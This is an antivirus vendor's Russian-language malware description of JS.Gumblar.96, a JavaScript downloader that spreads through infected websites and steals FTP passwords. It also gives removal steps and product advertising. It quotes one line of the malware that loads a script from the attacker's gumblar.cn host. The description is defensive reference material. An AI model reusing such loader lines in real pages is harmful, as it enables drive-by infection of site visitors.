Вирусная библиотека
База знаний
Последнее обновление: 2017-06-26 07:16:04 MSK

Вирусная пятёрка

SCRIPT.Virus4.90%
Trojan.DownLoader25.28121.43%
Adware.Downware.178381.36%
Adware.OpenCandy.1520.95%
Tool.FakeSLIC.20.82%
Поиск по вирусной базе

Бот Dr.Web для Telegram

JS.Gumblar.96

(Trojan-Downloader.JS.Gumblar.a, Trojan.Script.65526, JS:Redirector-H7, Parser error, JS/Gumblar.B, Troj/JSRedir-R, Obfuscated Script.f, Trojan:JS/Gamburl.A )

Добавлен в вирусную базу Dr.Web:2009-07-07
Описание добавлено:2009-07-14

Способ распространения

Вредоносный javascript JS.Gumblar.96, распространяется через зараженные веб-ресурсы. При посещении которых происходит определение типа веб-бразера и установленных плагинов, после чего осуществляется подгрузка javascript-сценария содержащего эксплойт или переадресация на злонамеренную веб-страницу.

Действия, совершаемые вирусом

JS.Gumblar.96 зашифрованный javascript-сценарий посредством которого в систему может быть установлен вредоносный исполняемый файл. Установленный в систему вирус влияет на результаты поиска в поисковой системе Google и похищает пароли от FTP-серверов для последующего их заражения.

В процессе посещения вредоносного веб-ресурса JS.Gumblar.96 осуществляет подгрузку javascript-сценария следующим образом:

document.write("src=//gumblar.cn/rss/?id=" + j + "")

После того, как вредоносный скрипт загружен происходит атака с использованием набора распространенных уязвимостей для установленного типа системы по полю User-Agent.

Рекомендации по лечению

  1. В случае если операционная система способна загрузиться (в штатном режиме или режиме защиты от сбоев), скачайте лечащую утилиту Dr.Web CureIt! и выполните с ее помощью полную проверку вашего компьютера, а также используемых вами переносных носителей информации.
  2. Если загрузка операционной системы невозможна, измените настройки BIOS вашего компьютера, чтобы обеспечить возможность загрузки ПК с компакт-диска или USB-накопителя. Скачайте образ аварийного диска восстановления системы Dr.Web® LiveDisk или утилиту записи Dr.Web® LiveDisk на USB-накопитель, подготовьте соответствующий носитель. Загрузив компьютер с использованием данного носителя, выполните его полную проверку и лечение обнаруженных угроз.
  3. Если работа операционной системы заблокирована вредоносной программой семейства Trojan.Winlock, воспользуйтесь сервисом разблокировки компьютера. Если подобрать код разблокировки не удалось, действуйте согласно инструкции, представленной в п.2.
Демо бесплатно Скачать Dr.Web
На 1 месяц (без регистрации) или 3 месяца (с регистрацией и скидкой на продление) По серийному номеру

Выполните полную проверку системы с использованием Антивируса Dr.Web Light для OS X. Данный продукт можно загрузить с официального сайта Apple App Store.

Демо бесплатно Скачать Dr.Web Скачать Dr.Web с Apple Store
На 1 месяц (без регистрации) или 3 месяца ( с регистрацией и скидкой на продление) По серийному номеру
  1. На загруженной ОС выполните полную проверку всех дисковых разделов с использованием продукта Антивирус Dr.Web для Linux.
Демо бесплатно Скачать Dr.Web
На 1 месяц (без регистрации) или 3 месяца (с регистрацией и скидкой на продление) По серийному номеру
  1. Если мобильное устройство функционирует в штатном режиме, загрузите и установите на него бесплатный антивирусный продукт Dr.Web для Android Light. Выполните полную проверку системы и используйте рекомендации по нейтрализации обнаруженных угроз.
  2. Если мобильное устройство заблокировано троянцем-вымогателем семейства Android.Locker (на экране отображается обвинение в нарушении закона, требование выплаты определенной денежной суммы или иное сообщение, мешающее нормальной работе с устройством), выполните следующие действия:
    • загрузите свой смартфон или планшет в безопасном режиме (в зависимости от версии операционной системы и особенностей конкретного мобильного устройства эта процедура может быть выполнена различными способами; обратитесь за уточнением к инструкции, поставляемой вместе с приобретенным аппаратом, или напрямую к его производителю);
    • после активации безопасного режима установите на зараженное устройство бесплатный антивирусный продукт Dr.Web для Android Light и произведите полную проверку системы, выполнив рекомендации по нейтрализации обнаруженных угроз;
    • выключите устройство и включите его в обычном режиме.

Подробнее о Dr.Web для Android

Демо бесплатно

На 14 дней

Скачать с сайта Скачать с Google Play Скачать по QR-коду
КУПИТЬ у партнёров | онлайн Добавить в библиотеку
О компании | Новости | Прислать вирус | Онлайн-сканер | Политика конфиденциальности | Карта сайта
[WebIQmeter] [Google+] [Rutube] [You Tube] [Twitter] [Facebook] [Vkontakte] [Одноклассники] [Instagram] [Pinterest]
«Доктор Веб» — российский производитель антивирусных средств защиты информации под маркой Dr.Web. Продукты Dr.Web разрабатываются с 1992 года. Компания — ключевой игрок на российском рынке программных средств обеспечения базовой потребности бизнеса — безопасности информации. «Доктор Веб» — один из немногих антивирусных вендоров в мире, владеющих собственными уникальными технологиями детектирования и лечения вредоносных программ. Антивирусная защита Dr.Web позволяет информационным системам клиентов эффективно противостоять любым, даже неизвестным угрозам.

«Доктор Веб» стал первой компанией, предложившей на российском рынке инновационную модель использования антивируса в качестве услуги, и по сей день продолжает оставаться безусловным лидером российского рынка интернет-сервисов безопасности для поставщиков ИT-услуг. Государственные сертификаты и награды, а также география пользователей Dr.Web свидетельствуют о высоком качестве продуктов, созданных талантливыми российскими программистами.


Rambler 100
антивирус.рф | www.drweb.ru | estore.drweb.ru | curenet.drweb.ru | www.av-desk.com | free.drweb.ru